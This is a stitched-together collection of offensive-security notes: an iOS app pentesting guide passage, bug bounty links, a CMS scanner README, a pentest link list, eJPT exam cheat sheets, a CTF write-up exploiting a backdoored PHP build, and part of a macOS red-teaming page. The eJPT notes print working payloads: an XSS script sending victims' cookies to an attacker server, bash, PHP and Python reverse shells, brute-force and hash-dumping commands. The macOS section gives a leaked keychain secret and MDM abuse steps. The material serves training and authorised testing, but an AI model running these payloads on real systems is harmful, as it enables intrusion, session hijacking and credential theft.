'-[someclass somemethod]' --dump-args --dump-backtrace --dump-return ``` Change the method's return value: ```bash ios hooking set return_value '-[someclass somemethod]' false ``` Monitor crypto libraries: ```fundamental ios monitor crypto ``` Monitor the pasteboard: ```fundamental ios pasteboard monitor ``` You can also dump the pasteboard using [cycript](#dump-the-pasteboard). ### Bypasses Bypass a jailbreak detection: ```bash ios jailbreak disable --quiet objection -g com.someapp.dev explore --startup-command 'ios jailbreak disable --quiet' ``` Also, on your iOS device, check `A-Bypass` in `Settings` app. --- Bypass SSL pinning: ```bash ios sslpinning disable --quiet objection -g com.someapp.dev explore --startup-command 'ios sslpinning disable --quiet' ``` Also, on your iOS device, check [SSL Kill Switch 2](#ssl-kill-switch-2) in `Settings` app. --- Bypass biometrics: ```bash ios ui biometrics_bypass --quiet objection -g com.someapp.dev explore --startup-command 'ios ui biometrics_bypass --quiet' ``` Also, you can import [Frida](#frida-scripts) script. ## 8. Repackage an IPA [SSH](#ssh-to-your-ios-device) to your iOS device and run the following commands. Navigate to the app specific directory: ```bash cd /private/var/containers/Bundle/Application/XXX...XXX/ ``` Repackage the IPA: ```fundamental mkdir Payload cp -r someapp.app Payload zip -r repackaged.ipa Payload rm -rf Payload ``` On your Kali Linux, download the repackaged IPA: ```fundamental scp [email protected]:/private/var/containers/Bundle/Application/XXX...XXX/repackaged.ipa ./ ``` If you want to pull a decrypted IPA from your iOS device, see section [Pull a Decrypted IPA](#pull-a-decrypted-ipa). ## 9. Miscellaneous ### Monitor the System Log On your Kali Linux, run the following command: ```fundamental idevicesyslog -p 1337 ``` ### Monitor File Changes [SSH](#ssh-to-your-ios-device) to your iOS device, then, download and run [Filemon](http://www.newosxbook.com): ```bash wget http://www.newosxbook.com/tools/filemon.tgz && tar zxvf filemon.tgz && chmod 777 filemon ./filemon -c -f com.someapp.dev ``` Always look for created or cached files, images/screenshots, etc. Use `nano` to edit files directly on your iOS device. Sensitive files such as know your customer (KYC) and similar, should not persists in the app specific directories on the user device after the file upload. Images/screenshots path: ```fundamental cd /var/mobile/Containers/Data/Application/YYY...YYY/Library/SplashBoard/Snapshots ``` ### Dump the Pasteboard After copying sensitive data, the app should wipe the pasteboard after a short period of time. [SSH](#ssh-to-your-ios-device) to your iOS device and run the following commands: ```fundamental cycript -p 1337 [UIPasteboard generalPasteboard].items ``` Press `CTRL + D` to exit. You can also monitor the pasteboard in [Objection](#7-objection). ### Get the Provisioning Profile ```fundamental scp [email protected]:/private/var/containers/Bundle/Application/XXX...XXX/*.app/embedded.mobileprovision ./ openssl smime -inform der -verify -noverify -in embedded.mobileprovision ``` ## 10. Tips and Security Best Practices Bypass any keyboard restriction by copying and pasting data into an input field. Access tokens should be short lived, and if possible, invalidated on logout. Don't forget to test widgets, push notifications, app extensions, and Firebase. --- App should not disclose sensitive data in the predictive text (due to incorrectly defined input field type), app switcher, and push notifications. App should warn a user when taking a screenshot of sensitive data. App should warn a user that it is trivial to bypass biometrics authentication if iOS device is jailbroken. Production app (i.e. build) should never be debuggable. ## 11. Useful Websites and Tools * [zxing.org/w/decode.jspx](https://zxing.org/w/decode.jspx) (decode QR codes) * [developer.apple.com/account](https://developer.apple.com/account) (code signing certificates, etc.) * [developer.apple.com/apple-pay/sandbox-testing](https://developer.apple.com/apple-pay/sandbox-testing) (test debit/credit cards for Apple Pay) * [youtube.com/\@iDeviceMovies](https://www.youtube.com/\@iDeviceMovies) (useful videos about jailbreaking, etc.) * [altstore.io](https://altstore.io) \([fix the installation issue](https://github.com/altstoreio/AltStore/issues/156#issuecomment-717133644)\) (alt. app store, jailbreak is not required)
### Resources For BugBounty Hunters Forums 1. BugBountyForum 2. BugBountyWorld Practise : 1. https://www.hacksplaining.com/lessons 2. https://www.amanhardikar.com/mindmaps/Practice.html 3. http://www.pentesterlabs.com/ 4. https://attackdefense.com/ 5. https://www.hackthebox.eu/ 6. https://picoctf.com/ 7. https://www.root-me.org/?lang=en Blogs Getting Started 1. https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102 2. https://forum.bugcrowd.com/t/researcher-resources-tutorials/370 3. https://www.hackerone.com/blog/become-a-successful-bug-bounty-hunter 4. https://www.stationx.net/how-to-become-a-bug-bounty-hunter/ 5. https://hackwarenews.com/top-hacking-simulator-games-every-aspiring-hacker-should-play-part-1/ 6. https://lifehacker.com/how-to-earn-money-as-a-bug-bounty-hunter-1797946520 7. https://www.bugcrowd.com/blog/how-to-use-bug-bounties-to-build-your-career-bug-bounty-hunter-methodology/ Tools 1. https://forum.bugcrowd.com/t/researcher-resources-tools/167 Online 1. https://backdoor.sdslabs.co/beginner 2. https://www.hackthebox.eu/ 3. https://pwnable.tw/ 4. https://ringzer0ctf.com/ 5. https://www.vulnhub.com/ 6. http://captf.com/practice-ctf/ Videos Resources : 1. https://github.com/onlurking/awesome-infosec 2. https://www.commandlinefu.com/commands/browse 3. http://programming-motherfucker.com/become.html Youtube : 1. https://www.youtube.com/user/JackkTutorials/videos 2. https://www.youtube.com/user/DEFCONConference/videos 3. https://www.youtube.com/user/Hak5Darren/playlists 4. https://www.youtube.com/user/hackfestca/videos 5. https://www.youtube.com/channel/UCo1NHk_bgbAbDBc4JinrXww/videos 6. https://www.youtube.com/watch?v=fDeLtKUxTmM 7. https://www.youtube.com/channel/UCHvUTfxL_9bNQgqzekPWHtg CIS BenchMarks : 1. https://www.cisecurity.org/cis-benchmarks/
<p align='center'> <img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br> <img src="https://img.shields.io/badge/Version-1.0.2%20Beta-brightgreen.svg?style=style=flat-square" alt="version"> <img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"> <img src="https://img.shields.io/aur/license/yaourt.svg?style=style=flat-square" alt="License"> </p> ## What is a CMS? > A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*. ## Release History ``` - Version 1.0.3 [06-07-2018] - Version 1.0.2 [06-07-2018] - Version 1.0.1 [19-06-2018] - Version 1.0.0 [15-06-2018] ``` [Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG) ## Functions Of CMSeek: - Basic CMS Detection of over 20 CMS - Advanced Wordpress Scans - Detects Version - Detects Users (3 Detection Methods) - Looks for Version Vulnerabilities and much more! - Modular bruteforce system - Use pre made bruteforce modules or create your own and integrate with it ## Requirements and Compatibility: CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed. ## Installation and Usage: It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands: - git clone `https://github.com/Tuhinshubhra/CMSeeK` - cd CMSeeK For guided scanning: - python3 cmseek.py Else: - python3 cmseek.py -u <target_url> [...] The rest should be pretty self explanotory. ## Checking For Update: You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update. P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update. ## Detection Methods: CMSeek uses mainly 2 things for detection: - HTTP Headers - Page Source Code ## Supported CMSs: CMSeeK currently can detect **22** CMSs, you can find the list on [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory. All the cmss are stored in the following way: ``` cmsID = { 'name':'Name Of CMS', 'url':'Official URL of the CMS', 'vd':'Version Detection (0 for no, 1 for yes)', 'deeps':'Deep Scan (0 for no 1 for yes)' } ``` ## Scan Result: All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well. Here is an example of the json report log: ![Json Log](https://i.imgur.com/5dA9jQg.png) ## Bruteforce Modules: CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: 1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex 2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module 3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory 4. Open CMSeeK and Rebuild Cache using `U` as the input in the first menu. 5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK. <p align='center'> <img alt="Cache Rebuild Screenshot" width="400px" src="https://i.imgur.com/2Brl7pl.png" /> </p> ## Need More Reasons To Use CMSeeK? If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages. Also you can try reading comments in the code those are pretty random and weird!!! ## Screenshots: <p align="center"> <img alt="Main Menu" width="600px" src="https://i.imgur.com/KdRSYzP.png" /> <br><em>Main Menu</em><br> <img alt="Scan Result" width="600px" src="https://i.imgur.com/C8SKQ1D.png" /> <br><em>Scan Result</em><br> <img alt="WordPress Scan Result" width="600px" src="https://i.imgur.com/CK4O1Yd.png" /> <br><em>WordPress Scan Result</em><br> </p> ## Opening issue: Please make sure you have the following info attached when opening a new issue: - Target - Exact copy of error or screenshot of error - Your operating system **Issues without these informations might not be answered!** ## Disclaimer: **Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** ## License: CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE) ## Follow Me @r3dhax0r: [Twitter](https://twitter.com/r3dhax0r) || [Facebook](https://fb.com/r3dhax0r) || [Instagram](https://instagram.com/r3dhax0r) ## Team: [Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
# PenTest CheatSheets This is a repo for pentest cheat sheets which I have found useful!! 1. https://pentestbook.six2dez.com/others/web-checklist is pentest `#Checklist`. 2. https://github.com/trimstray/the-book-of-secret-knowledge#hackingpenetration-testing-toc is a complete cheatsheet. `#CheatSheet` 3. https://github.com/enaqx/awesome-pentest is a complete cheatsheet. `#CheatSheet` 4. https://github.com/enaqx/awesome-pentest for Pentest cheatsheet. `#CheatSheet` 5. https://github.com/riramar/Web-Attack-Cheat-Sheet for Pentest cheatsheet. `#CheatSheet` 6. https://github.com/swisskyrepo/PayloadsAllTheThings for various attacks paloads. `#attackPayloads` 7. https://github.com/tennc/webshell for collection of web shells. `#webshells` 8. https://portswigger.net/web-security/cross-site-scripting/cheat-sheet for XSS cheat sheets. `#XSS` 9. https://github.com/Walidhossain010/WAF-bypass-xss-payloads for XSS payloads for bypassing WAFs. `#XSS #WAF` 10. https://book.hacktricks.xyz/pentesting-web/file-upload for file upload cheat sheets. `#fileUpload` 11. https://github.com/modzero/mod0BurpUploadScanner for upload scanner for burp. `#uploadScanner` 12. https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dpapi-extracting-passwords for DPAPI - Extracting Passwords. `#Crypto` 13. https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack for Pass-the-Hash(PtH) Attack. `#Crypto` 14. https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/ for TLS Vulnerabilities. `#TLS` 15. https://www.cloudinsidr.com/content/known-attack-vectors-against-tls-implementation-vulnerabilities/ for Attack vectors against TLS. `#TLS` 16. https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html for REST Security Cheat Sheet. `#API` 17. https://owasp.org/www-project-api-security/ for API testing. `#API` 18. https://blog.nvisium.com/angular-for-pentesters-part-1 is Angular And AngularJS For Pentesters. `#Angular` 19. https://portswigger.net/web-security/websockets for WebSocket Pentesting. `#WebSocket` 20. https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html for REST API Pentesting. `#REST_API` 21. https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS for CORS. `#CORS` 22. https://github.com/cipher387/Dorks-collections-list/ for Dorks. `#Dork` 23. https://github.com/gquere/pwn_jenkins for Pentesting Jenkins. `#Jenkins` 24. https://many-passwords.github.io/ for collection of default passwords. `#default #password` 25. https://github.com/arainho/awesome-api-security for API PenTest. `#API #Pentest` ## Pentest Report 1. https://github.com/juliocesarfort/public-pentesting-reports for PenTesting report samples. `#Report` 2. https://cure53.de/ for pentest reports of popular applications. `#reports #popular_apps` ## Code Analysis 1.https://deepscan.io/demo/ for statically analyzing JS, VUE, and React code. `#staticAnalysis` ## Pentest Methodology 1. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines for pentest methodology. `#methodology` ## Asset Discovery and Enumeration 1. https://github.com/OWASP/Amass 2. https://github.com/redhuntlabs/Awesome-Asset-Discovery ## Learning to PenTest These websites are recommended for learning to Pentest. 1. https://www.hackthebox.eu/ 2. https://tryhackme.com/ 3. https://www.root-me.org/ 4. https://github.com/Ignitetechnologies/HackTheBox-CTF-Writeups `HackTheBox CTF Cheatsheet` ## FireEye Red Team to learn! 1. https://github.com/PowerShellMafia/PowerSploit 2. https://www.cobaltstrike.com/help-beacon 3. https://github.com/GhostPack/Seatbelt 4. https://github.com/cobbr/SharpSploit 5. https://github.com/med0x2e/RT-EWS 6. https://github.com/med0x2e/GadgetToJScript 7. https://github.com/SecureAuthCorp/impacket 8. https://github.com/Kevin-Robertson/InveighZero 9. https://github.com/denandz/KeeFarce 10. https://github.com/med0x2e/NET-Assembly-Inject-Remote 11. https://github.com/med0x2e/NoAmci/ 12. https://github.com/GhostPack/Rubeus 13. https://github.com/GhostPack/SafetyKatz 14. https://github.com/IllidanS4/SharpUtils/ 15. https://github.com/hoangprod/AndrewSpecial 16. https://github.com/rasta-mouse/RuralBishop ## Android Apps Security Evaluation and PenTest 1. https://github.com/OWASP/owasp-mstg ## Scanners for popular and dangerous vulnerabilities 1. https://github.com/fullhunt/log4j-scan `CVE-2021-44228 - Apache Log4j RCE Scanner` `#log4j` ## Android 1. https://github.com/saeidshirazi/awesome-android-security ## Building Pentest Environment 1. https://github.com/cybersecsi/HOUDINI
# eJPT some eLearnSecurity eJPT exam preparation materials ### nmap + fping hosts discovery fping: ```bash fping -a -g 10.10.10.0/24 2> fping.txt ``` hosts discovery nmap: ```bash nmap -sn 10.10.10.0/24 > hosts.txt nmap -sn -T4 10.10.30.0/24 -oG - | awk '/Up$/{print $2}' ``` open ports scan (save to file): ```bash nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open ``` UDP port scan: ```bash nmap -sU -sV 10.10.10.0/24 ``` nmap vuln scan example: ```bash nmap --script vuln --script-args=unsafe=1 -iL hosts.txt ``` nmap SYN flood example: ```bash watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251" ``` ### masscan masscan open only examples: ```bash sudo masscan -p 21,22,80,8080,445,9200 --rate 64000 --wait 0 --open-only -oG masscan.gnmap 10.0.0.0/24 sudo masscan -iL hosts.list -p0-65535 --rate 64000 --open-only ``` ### httprint httprint banner grabling: ```bash httprint -P0 -s /usr/share/httprint/signatures.txt -h 10.10.10.15 ``` ### route add a route in kali/parrot: ```bash ip route add 192.168.88.0/24 via 10.10.34.1 ``` routing table: ```bash netstat -rn Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface ... 192.168.88.0 10.10.34.1 255.255.255.0 UG 0 0 0 tap0 ... ``` ### subdomains discovery subdomain of a target by sublist3r: ```bash sublist3r -d company.com ``` ## wireshark filter by ip ```bash ip.add == 10.10.10.9 ``` filter by dest ip ```bash ip.dest == 10.10.10.15 ``` filter by source ip ```bash ip.src == 10.10.16.33 ``` filter by tcp port ```bash tcp.port == 25 ``` filter by ip addr and port ```bash ip.addr == 10.10.14.22 and tcp.port == 8080 ``` filter SYN flag ```bash tcp.flags.syn == 1 and tcp.flags.ack ==0 ``` broadcast filter ```bash eth.dst == ff:ff:ff:ff:ff:ff ``` ### web app enum (gobuster) ```bash nc -v 10.10.10.14 80 HEAD / HTTP/1.0 openssl s_client -connect 10.10.10.14:443 dirb http://10.10.10.123/ dirb https://10.10.10.5 /usr/share/dirb/wordlists/vulns/apache.txt dirb https://192.168.16.33 /usr/share/dirb/wordlists/common.txt gobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirb/common.txt -t 16 ``` ### web app enum (ffuf) directory discovery: ```bash ffuf -w wordlist.txt -u http://example.com/FUZZ ``` file discovery: ```bash ffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html ``` output of responses with status code: ```bash ffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301 ``` the -maxtime flag offers to end the ongoing fuzzing after the specified time in seconds: ```bash ffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60 ``` number of threads: ```bash ffuf -w wordlist.txt -u http://example.com/FUZZ -t 64 ``` ### sqlmap determine the databases: ```bash sqlmap -u http://10.10.10.15/?id=4 --dbs ``` determine the tables: ```bash sqlmap -u http://10.10.10.15/?id=4 -D dbname --tables ``` dump a table's data: ```bash sqlmap -u http://10.10.10.15/?id=4 -D dbname -T table --dump ``` try to get os-shell: ```bash sqlmap -u http://10.10.10.15/?id=4 --os-shell ``` ### xss check example: ```javascript <script>alert("hack :)")</script> ``` #### hijack cookie through xss there are four components as follows: - attacker client pc - attacker logging server - vulnerable server - victim client pc 1) attacker: first finds a vulnerable server and its breach point. 2) attacker: enter the following snippet in order to hijack the cookie kepts by victim client pc (p.s.: the ip address, 192.168.99.102, belongs to attacker logging server in this example): ```javascript <script>var i = new Image();i.src="http://192.168.99.102/log.php?q="+document.cookie;</script> ``` 3) attacker: log into attacker logging server (P.S.: it is 192.168.99.102 in this example), and execute the following command: ```bash nc -vv -k -l -p 80 ``` 4) attacker: when victim client pc browses the vulnerable server, check the output of the command above. 5) attacker: after obtaining the victim's cookie, utilize a firefox's add-on called Cookie Quick Manager to change to the victim's cookie in an effort to hijack the victim's privilege. ### bruteforce (hydra, john, hashcat) wordlist generation ```bash cewl example.com -m 3 -w wordlist.txt ``` hydra http basic auth brute ```bash hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ ``` hydra brute http digest ```bash hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ ``` hydra brute http post form ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" ``` hydra brute http authenticated post form ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" ``` hydra brute ```bash hydra -f -v -V -L users.txt -P rockyou-15.txt -s 2223 -f ssh://10.10.10.17 hydra -v -V -l admin -P rockyou-10.txt ssh://10.10.10.18 ``` combine passwd with shadow file for john the ripper: ```bash unshadow passwd shadow > crack.hash ``` john the ripper bruteforce: ```bash john -wordlist /usr/share/wordlists/rockyou.txt crack.hash john -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash ``` hashcat: ```bash hashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt ``` ### wpscan ```bash wpscan --url http://10.10.10.14 --enumerate u wpscan --url example.com -e vp --plugins-detection mixed --api-token API_TOKEN wpscan --url example.com -e u --passwords /usr/share/wordlists/rockyou.txt wpscan --url example.com -U admin -P /usr/share/wordlists/rockyou.txt ``` ### mysql scan: ```bash nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13 ``` examples: ```bash mysql -h 10.10.10.23 -P 13306 -u root -p -e "show databases;" mysql -h 10.10.10.23 -P 13306 -u root -p -e "use mydb;show tables;" mysql -h 10.10.10.23 -P 13306 -u root -p -e "use mydb;select * from users;" ``` ### msfconsole search exploit ```bash msf> search cve:2011 port:135 platform:windows target:XP ``` basic ```bash msfconsole use auxiliary/scanner/mssql/mssql_login set rhosts 10.10.10.110 set rports 1433 set username admin set password 12345 set verbose true run ``` ### msfconsole examples msssql enum ```bash use auxiliary/scanner/mssql/mssql_enum set username admin set password 12345 set rhosts 10.10.10.177 set rport 1433 run ``` mssql payload ```bash use exploit/windows/mssql/mssql_payload set rhosts 10.10.10.177 set rport 1433 set srvport 53 set username admin set password qwerty set payload windows/x64/meterpreter_reverse_tcp ``` ssh login enum (brute) ```bash use auxiliary/scanner/ssh/ssh_login show options set rhosts 10.10.10.133 set user_file /usr/share/ncrack/minimal.usr set pass_file /usr/share/ncrack/minimal.usr set verbose true run ``` eternal blue example: ```bash use exploit/windows/smb/ms17_010_eternalblue show options set payload windows/x64/meterpreter/reverse_tcp ``` ### meterpreter ```bash meterpreter>run autoroute -s 172.16.50.0/24 background sessions -l sessions -i 1 sysinfo, ifconfig, route, getuid getsystem (privesc) bypassuac download x /root/ upload x C:\\Windows shell use post/windows/gather/hashdump ``` ### windows shares with null sessions enumeration with kali/parrot tools: ``` nmblookup -A 10.16.64.223 smbclient -L //10.16.64.223 -N share smbclient //10.16.64.223/share -N mount enum4linux -a 10.10.10.13 ``` enumeration with nmap: ```bash ll /usr/share/nmap/scripts/ | grep smb-enum- -rw-r--r-- 1 root root 4846 Jan 9 2019 smb-enum-domains.nse -rw-r--r-- 1 root root 5931 Jan 9 2019 smb-enum-groups.nse -rw-r--r-- 1 root root 8045 Jan 9 2019 smb-enum-processes.nse -rw-r--r-- 1 root root 27262 Jan 9 2019 smb-enum-services.nse -rw-r--r-- 1 root root 12057 Jan 9 2019 smb-enum-sessions.nse -rw-r--r-- 1 root root 6923 Jan 9 2019 smb-enum-shares.nse -rw-r--r-- 1 root root 12531 Jan 9 2019 smb-enum-users.nse nmap --script=smb-enum-users 192.168.1.10 ``` #### null sessions 1) Use "enum4linux -n" to make sure if "<20>" exists: ```bash enum4linux -n 192.168.1.10 ``` 2) If "<20>" exists, it means Null Session could be exploited. Utilize the following command to get more details: ```bash enum4linux 192.168.1.10 ``` 3) If confirmed that Null Session exists, you can remotely list all share of the target: ```bash smbclient -L WORKGROUP -I 192.168.1.10 -N -U "" ``` 4) You also can connect the remote server by applying the following command: ```bash smbclient \\\\192.168.1.10\\c$ -N -U "" ``` 5) Download those files stored on the share drive: ```bash smb: \> get Congratulations.txt ``` ### ARP spoofing ```bash echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i tap0 -t 10.13.37.100 -r 10.13.37.101 ``` ### reverse shell bash ```bash bash -i >& /dev/tcp/10.0.14.22/4444 0>&1 ``` php one line (bash) ```php <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.14.10/4444 0>&1'"); ?> ``` python ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") ``` ## programming examples port scanner examples: [python simple tcp scan example](https://github.com/cocomelonc/ejpt/blob/master/scanner.py) [golang simple tcp scan example](https://github.com/cocomelonc/ejpt/blob/master/scanner.go)
### IP `10.10.137.94` # Enumeration ### nmap `nmap -sC -sV 10.10.137.94 -oN init.nmap` ``` Nmap scan report for 10.10.137.94 Host is up (0.12s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp filtered http ``` Only port 80 is open. I also ran a full port-scan here, but nothing else showed up. For a while, I was doing directory scanning and subdomain enumeration, which also didn't really find anything. ### Nikto I typically never run Nikto, but my scanning wasn't showing anything, and neither were burp or my manual webpage exploration. `nikto -h http://10.10.137.94` ``` - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 10.10.114.122 + Target Hostname: 10.10.114.122 + Target Port: 80 + Start Time: 2022-12-10 23:27:48 (GMT-5) --------------------------------------------------------------------------- + Server: No banner retrieved + Retrieved x-powered-by header: PHP/8.1.0-dev + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-3092: /demo/: This might be interesting... + OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution + 6544 items checked: 24 error(s) and 11 item(s) reported on remote host + End Time: 2022-12-10 23:56:23 (GMT-5) (1715 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` Here, we can see a header titled `X-Powered-By` with the contents `PHP/8.1.0-dev` It looks like this version of PHP is vulnerable to Remote Code Execution through a backdoor. I looked up an exploit with searchsploit and downloaded it with `searchsploit -m php/webapps/49933.py` Running this exploit and entering the hostname gets us a reverse shell. For some reason I couldn't change directories, so I used `ls /` to see that the `flag.txt` was in `/flag.txt`: `flag{4127d0530abf16d6d23973e3df8dbecb}`
# macOS Red Teaming <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>โ˜๏ธ HackTricks Cloud โ˜๏ธ</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>๐Ÿฆ Twitter ๐Ÿฆ</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>๐ŸŽ™๏ธ Twitch ๐ŸŽ™๏ธ</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>๐ŸŽฅ Youtube ๐ŸŽฅ</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**๐Ÿ’ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐Ÿฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details> ## Abusing MDMs * JAMF Pro: `jamf checkJSSConnection` * Kandji If you manage to **compromise admin credentials** to access the management platform, you can **potentially compromise all the computers** by distributing your malware in the machines. For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: {% content-ref url="macos-mdm/" %} [macos-mdm](macos-mdm/) {% endcontent-ref %} ### Using MDM as a C2 A MDM will have permission to install, query or remove profiles, install applications, create local admin accounts, set firmware password, change the FileVault key... In order to run your own MDM you need to **your CSR signed by a vendor** which you could try to get with [**https://mdmcert.download/**](https://mdmcert.download/). And to run your own MDM for Apple devices you could use [**MicroMDM**](https://github.com/micromdm/micromdm). However, to install an application in an enrolled device, you still need it to be signed by a developer account... however, upon MDM enrolment the **device adds the SSL cert of the MDM as a trusted CA**, so you can now sign anything. To enrol the device in a MDM you. need to install a **`mobileconfig`** file as root, which could be delivered via a **pkg** file (you could compress it in zip and when downloaded from safari it will be decompressed). **Mythic agent Orthrus** uses this technique. ### Abusing JAMF PRO JAMF can run **custom scripts** (scripts developed by the sysadmin), **native payloads** (local account creation, set EFI password, file/process monitoring...) and **MDM** (device configurations, device certificates...). #### JAMF self-enrolment Go to a page such as `https://<company-name>.jamfcloud.com/enroll/` to see if they have **self-enrolment enabled**. If they have it might **ask for credentials to access**. You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) to perform a password spraying attack. Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form: ![](<../../.gitbook/assets/image (7).png>) #### JAMF device Authentication <figure><img src="../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\ Moreover, jamf **persist** 